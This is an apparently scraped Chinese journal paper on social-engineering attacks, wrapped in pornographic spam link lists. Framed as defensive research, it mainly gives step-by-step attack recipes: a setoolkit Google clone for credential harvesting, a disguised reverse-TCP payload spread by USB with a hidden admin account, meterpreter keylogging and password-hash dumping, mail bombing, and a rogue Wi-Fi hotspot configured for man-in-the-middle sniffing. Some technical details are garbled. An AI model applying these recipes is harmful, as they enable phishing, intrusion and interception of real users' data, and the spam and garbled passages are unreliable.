999精品在线视频,手机成人午夜在线视频,久久不卡国产精品无码,中日无码在线观看,成人av手机在线观看,日韩精品亚洲一区中文字幕,亚洲av无码人妻,四虎国产在线观看 ?

社會工程學的攻擊原理及其實現方式

2020-07-27 16:32:05高小輝
中阿科技論壇(中英阿文) 2020年6期

摘要:隨著軟硬件的快速發展,人本在享受物聯網帶來的簡易生活時,同時人的信息安全和財產安全變得更加重要,了解網絡中的攻擊手段就顯得更為重要,論文基于對社會工程學的攻擊原理進行分析,采取實踐應用方法,將其攻擊流程和手段展示出來,最終目的是為保護信息安全提供基本依據和啟發。重點介紹了四種生活中普遍見到的社會工程學攻擊方式,并通過kalix操作系統和setoolkit攻擊套件進行實踐,給出攻擊方式的理念和方式,并展現其攻擊的多樣化。

關鍵詞:社會工程學攻擊;kali;棧溢出漏洞;網絡信息安全

中圖分類號:D918;TP393.08????????????文獻標識碼:A

收稿日期:2020-05-22

作者簡介:高小輝(1997-),男,本科,研究方向:信息安全和算法分析。

通過介紹5種社會工程學攻擊方式:魚叉攻擊,釣魚攻擊,惡意媒介攻擊,群郵攻擊,展現各自的原理和獨特的實驗過程,對社會工程學和心理學的共同研究,展現不同的攻擊方式,向網絡安全人員提供參考,有助于實現信息安全的靶向治療。

1社會工程學的由來與發展

凱文.米特尼克是被認為社會工程學的奠基人好,他成功的將心理學融入其中,利用網民的社會行為和心里將其弱點暴露出來,讓一些技術探測工具有機可乘。

現代社會工程學與心理學能融合進一步加深,基于此一系列衍生工具和技術,采用最基本的攻擊方式,攻擊者洞悉網民心理弱點,并利用心理弱點,繼而一些讓網民遭受巨大財產損失。

2社會工程學攻擊方式

2.1獵奇心理和魚叉式攻擊

當人們遇到不知道,不熟悉或比較奇異的事物,常會不加思考的去接觸此類事物,而截取被攻擊的信息則是利用獵奇心理和較低的防患意識,當人去瀏覽網頁和這下載文件,攻擊者事先利用人的獵奇心理,可以對文件名使用關于黃色,賺取巨額利潤等字眼或者利用當下熱點新聞,使被攻擊者主動下載危險附件。危險附件的制作是基于棧溢出漏洞,由被攻擊者提前制作好或者直接利用被攻擊者系統本身自帶的棧溢出漏洞,這里首先介紹棧溢出漏洞原理和怎樣利用window XP存在的棧溢出漏洞程序來控制被攻擊機。

棧漏洞溢出是指在棧內寫入超出長度的限制數據,同時利用緩沖器溢出改寫數據和執行流程,從而破壞程序的運行,獲得系統控制權的攻擊手段,這里涉及主要三個寄存器ESP ESP 和EIP.棧指針寄存器(extended?stack?pointer),其內存放著一個指針,該指針永遠指向系統棧最上面一個棧幀的棧頂,基址指針寄存器(extended?base?pointer),其內存放著一個指針,該指針永遠指向系統棧最上面一個棧幀的底部,EIP寄存器,用來存儲CPU要讀取指令的地址,CPU通過EIP寄存器讀取即將要執行的指令。每次CPU執行完相應的匯編指令之后,EIP寄存器的值就會增加,如表1所示。

上述步驟生成了一個內部含有攻擊代碼指令的文件,將其發布到網上,在這里攻擊對象是有Xp用戶下載,當用戶下載完畢并打開時候,kali應當事先開啟主機進行監測。啟動配套使用工具msfdb數據庫,并進入msfconsole控制臺,然后使用句柄設置載荷模塊,指定攻擊機的IP和端口,若成功建起攻擊機和被攻擊機的會話,可使用meterpreter模塊來獲得被攻擊機的系統控制權,例如使用screenshot獲得被控制機的當前屏幕的截圖,使用keycan_start和key_scan_dump獲取被控制機的鍵盤輸入記錄。另外還可以使用hashdump來獲得密碼的hash值,借助于Johnny進行哈希值的破解或者下載彩虹表進行攻擊,來取得被攻擊機的系統密碼。

2.2.釣魚攻擊

釣魚攻擊利用偽造的知名機構來竊取賬戶名及其密碼,利用登陸者的行為慣性和盲目信任。在kali中setoolkit社會工程學中有完整的偽造知名網站的能力,現以主機A(A為公網ip)作為竊取主機,并在此主機上偽造www.google.com進而獲取登陸者的密碼和賬戶。

啟動setoolkit后,

第一步:選擇社會工程學攻擊,選定Social-Engineering Attacks;

第二步:選擇站點攻擊,選擇Website Attack Vectors;

第三步:選擇機密信息攻擊,站點克隆,選擇Credential Harvester Attack Method,選擇Site Cloner

Enter the url to clone:http://www.google.com

//這里我們選擇谷歌網站

第四步:配置監聽主機。

IP address for the POST back in Harvester/Tabnabbing?:xxx.xxx.xx.xx

當上述工作完成后,登陸者使用A登錄的時候,監聽主機將獲得此登陸者的用戶名和密碼,如下圖所示:

釣魚攻擊的核心問題:如何使登陸者跳轉到一個自己不認識公網IP?這決定了釣魚攻擊的成敗。現提出如下解決辦法:(1)對公網IP申請大量相似域名,進行公網IP和域名的綁定,這類方法較為耗費財力和人力進行維護,可以稱之為撒網式釣魚。(2)購買大量網站流量,來獲得較高的曝光率,有意的進行引流,從而在檢索排名靠前,可以稱之為緊縮網口。(3)欺詐郵箱,自動將自己主機相似域名大量轉發,適合定向撈魚。(4)以超鏈接的方式,src屬性轉向自己的公網IP,而文本內容卻是你偽造的網站地址。

2.3.創造惡意傳播媒介

將創造的惡意媒介,利用U盤或附加文件的形式下載到被攻擊機上,創造的惡意媒主動向監聽機建立一個會話,使用Meterpreter創造出的攻擊載荷返回一個控制通道。另外防止被攻擊機進行漏洞處理,可以采用創建影子賬戶,或者創建隱藏賬戶來進行權限維持。

利用setoolkit實現方式:

第一步:選擇社會工程學攻擊。

選擇Social-Engineering Attacks

第二步:選擇創造惡意媒介,選擇逆向tcp連接,選擇Windows Shell Reverse_TCP

設置監聽賬戶:IP address for payload listener:xxx.xxx.xx.xx。

第三步:將生成的payload.exe,autorun等文件進行偽裝,發布到被攻擊的主機上。

生成文件如下圖所示:

第四步:在被攻擊機主動或被動運行惡意媒介,攻擊機獲得被攻擊的控制權,為防止漏洞處理,進行創建影子賬戶,分配最高權限。

添加賬戶:net user username password add。

一個關鍵核心問題,怎么偽裝或隱藏載荷文件,較好的方法:(1)利用當下熱點新聞,利用網民的從眾心理,進行擴散式傳播文件。(2)偽裝成正常圖標,進行發布。發布的網站一般是不正規網站,但是持有大量流量,利用網民的占有欲望,麻木警覺。

2.4.群發郵件攻擊

大規模郵件攻擊是一種社會工程攻擊,其中大量的郵件是發送給受害者,以填滿其電子郵件收件箱和崩潰受害者的郵箱。 當一封重要郵件到達受害者設備,而受害者并不知道這一點時,攻擊者發送大量的垃圾郵件,?如果收件箱沒有崩潰,垃圾郵件的發送量是如此之大,以至于重要的郵件隱藏在垃圾郵件中。 它也被稱為電子轟炸和短信攻擊。

實現方式:

第一步:選擇社會工程學攻擊,選擇Social-Engineering Attacks;

第二步:選擇群發郵件攻擊,生成郵件賬戶單。選擇Mass Mailer Attack,導入郵件賬戶單,選擇E-mail Attack Mass Mailer,導入路徑Path to the file to import into SET: /xx/xx/file;

第三步:設置私人個人賬戶作為發送郵件的賬戶。

Use a gamil?Account for your email attack

Your gmail email address:xxx@.com

Flag this message/s as high priority?Yes

#設置郵件優先權為高

Do you want to attach a file - [y/n]: n

Do you want to attach an inline file - [y/n]: n

#這里我們選擇不添加附件,這里的附件經常與病毒文件混合在一起,這里我們只是實現群郵攻擊

Email subject:xxx

Send the message as html or plain? 'h' or 'p' [p]:p

nter?the body of the message, type END (capitals) when finished:xxx

Next line of the body: END

#設置文件主題和內容

第四步:測試群郵攻擊。

被攻擊賬戶郵件如圖,攻擊次數295次:

2.5?無線接入點引導攻擊

此類攻擊方式利用通過偽裝的wifi熱點,通常采用免費方式接入,引導人們接入wifi,當用戶一旦接入,攻擊者便可截取一些私密信息,它的實現方式主要依賴于Kali系統三大工具,Airbase-ng,DHCP-server和Ettercap,Airbase-ng主要用于攻擊客戶端,例如,用于在無線接口上啟用和禁用監聽模式,DHCP-SERVER用于給接入者分配IP,Ettercap用于嗅探數據,進行中間人攻擊,在實踐中發現,使用功率更大的無線網卡成功幾率更高,地點一般選擇比較繁華場所,熱點名稱應具有誘惑性和迷惑性。

實現方式:

安裝主要服務套件 :

安裝dhcp讀取:sudo apt-get install isc-dhcp-server

對isc-dhcp-server服務器進行基本配置:

配置方面主要涉及子網配置,DHCP和路由配置:

nano -w /etc/dhcp/dhcpd.conf

Default-lease-time 600;

#設置默認租約

max-lease-time 7200;

#設置最大租約

Ddns-update-style none

Authoritative;

#設置dhcp服務器為權威

Subet?192.168.1.0 netmask?255.255.255.0{

Range 192.168.1.3 192.168.140;

#配置分配ip范圍

Option domain-name-servers 192.168.1.1;

#配置dhcp服務器的ip地址

Option domain-name ?“example.org”

Option routers 192.168.1.1;

#設置路由ip,這里保持和dhcp一致。

Option subnet-mask 255.255.255.0;

}

3對外載網卡啟用監聽模式,這里使用Ralink?802.11 n WLAN

在啟用前使用檢查airmon是否已經開啟,避免沖突,這里直接檢查后直殺死進程

airmon-ng ?check

Found 2 processes that could cause trouble.

Kill them using 'airmon-ng check kill' before putting

the card in monitor mode, they will interfere by changing channels

and sometimes putting the interface back in managed mode

PID Name

672 NetworkManager

1300 wpa_supplicant

airmon-ng ?check kill

Killing these processes

PID Name

_supplicant

4配置橋接網絡

將wifi熱點廣播,轉發到內核網絡主要配置如下:

sudo ifconfig?at0?192.168.1.1 netmask?255.255.255.0

#設置有線接口卡at0,并且綁定到路由器

sudo ifconfig?at0 mtu?1400

#設置接收的數據塊大小,不能太小,否則接收異常

sudo route add -net 192.168.1.0 netmask?255.255.255.0 gw 192.168.1.1

#將路由添加到路由表上

sudo sh -c 'sudo echo 1 > /proc/sys/net/ipv4/ip_forward'

#設置ipv4轉發

sudo iptables?-t nat -A PREROUTING -p udp -j DNAT --to 192.168.43.1

#配置網關路由

sudo iptables?-P FORWARD ACCEPT

sudo iptables?--append FORWARD --in-interface at0 -j ACCEPT

sudo iptables?--table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE

#注意這里設置外部連接網絡eth0,這一步有利于實現更加真實的欺騙,比如接入者不受感受到網絡的異常

sudo dhcpd?-cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0

5查看欺騙wifi,并行行測試

手機客戶端掃描的wifi如圖所示,可以看到example.org

當連接example.org wifi時,數據的劫持如圖所示。

5結語

社會工程學的攻擊方式與心理學的使用存在彼此關聯和聯系,從上述列舉了典型的社會工程學攻擊方式及其實現方式,社會工程學攻擊的實現的較為容易,但是一些殺毒軟件的防護愈發嚴格,漏斗補丁發布愈加頻繁,這對社會工程學的攻擊方式產生了較大的不利影響,但是從另一方面看,社會工程學的攻擊攻擊理念也在不斷改變,從技術和工具支持,轉向偏人的行為研究,并以此為基礎,發展新的社會工程學攻擊技術和工具。

參考文獻:

[1]米特尼克,西蒙.反欺騙的藝術[M]..北京:清華大學出版社,2014.

[2]李華峰.Kali Linux 2網絡滲透測試實踐指南[M],北京:人民郵電出版社,2008.

[3]詹姆斯.F.庫羅斯.計算機網絡自頂向下方法[M].北京:機械工業出版社,2018.

Abstract: With the rapid development of software and hardware, when people are enjoying the simple life brought by the Internet of Things, at the same time, peoples information security and property security become more important, and it is more important to understand the attack methods in the network. The paper is based on It analyzes the attack principle of social engineering, adopts a practical application method, and displays its attack process and means. The ultimate goal is to provide basic basis and inspiration for protecting information security. It focuses on the four social engineering attack methods that are commonly seen in life, and is practiced through the kalix?operating system and setoolkit?attack suite. The concepts and methods of the attack methods are given, and the diversity of their attacks is demonstrated.

Key?words: Social engineering attack; Kali; Stack overflow vulnerability; Network information security

主站蜘蛛池模板: 国产精品亚洲天堂| 91精品啪在线观看国产| 在线观看亚洲国产| 欧美成一级| 国产aaaaa一级毛片| 日本成人福利视频| 欧美精品亚洲日韩a| 亚洲无卡视频| 一级毛片免费不卡在线| 91国内视频在线观看| 久久人体视频| 91色老久久精品偷偷蜜臀| 国产微拍一区| 亚洲首页国产精品丝袜| 日韩成人午夜| 国产精品视频999| 国产本道久久一区二区三区| 久草中文网| 日本一区二区不卡视频| 国产精品嫩草影院视频| 男女男免费视频网站国产| 亚洲首页在线观看| 欧美另类第一页| 99草精品视频| 欧美高清国产| 亚洲第一网站男人都懂| 精品久久综合1区2区3区激情| 亚洲国模精品一区| 久久久久亚洲AV成人网站软件| 国产精品蜜臀| 久操中文在线| 久久动漫精品| 91福利片| 国产无遮挡裸体免费视频| 日本国产在线| 欧美成人日韩| 毛片手机在线看| 国产男女免费完整版视频| 伊人五月丁香综合AⅤ| 免费网站成人亚洲| a毛片基地免费大全| 成人免费黄色小视频| 最新痴汉在线无码AV| 欧美日本在线| 国产69精品久久久久妇女| 日韩精品无码免费一区二区三区| 992tv国产人成在线观看| 日韩色图区| 亚洲精品天堂自在久久77| 午夜福利网址| 国产精品露脸视频| 国产精品va| 精品精品国产高清A毛片| 91免费国产在线观看尤物| 四虎永久在线视频| 亚洲无码精品在线播放| 青青国产在线| 一级不卡毛片| 91激情视频| 热99re99首页精品亚洲五月天| 欧美色99| 日韩无码视频播放| 久久精品视频一| 色老头综合网| 国内精品视频区在线2021| 欧美日韩国产高清一区二区三区| 国产成人三级| 婷婷亚洲天堂| 国产精品自拍合集| 99草精品视频| 国产欧美日韩资源在线观看| 午夜无码一区二区三区| 亚洲激情99| 成人国产一区二区三区| 欧美在线视频a| 免费在线观看av| 91精品国产91欠久久久久| 国产精品无码制服丝袜| 国产精品无码久久久久久| 日韩高清在线观看不卡一区二区 | 亚洲欧洲国产成人综合不卡| 国产成人夜色91|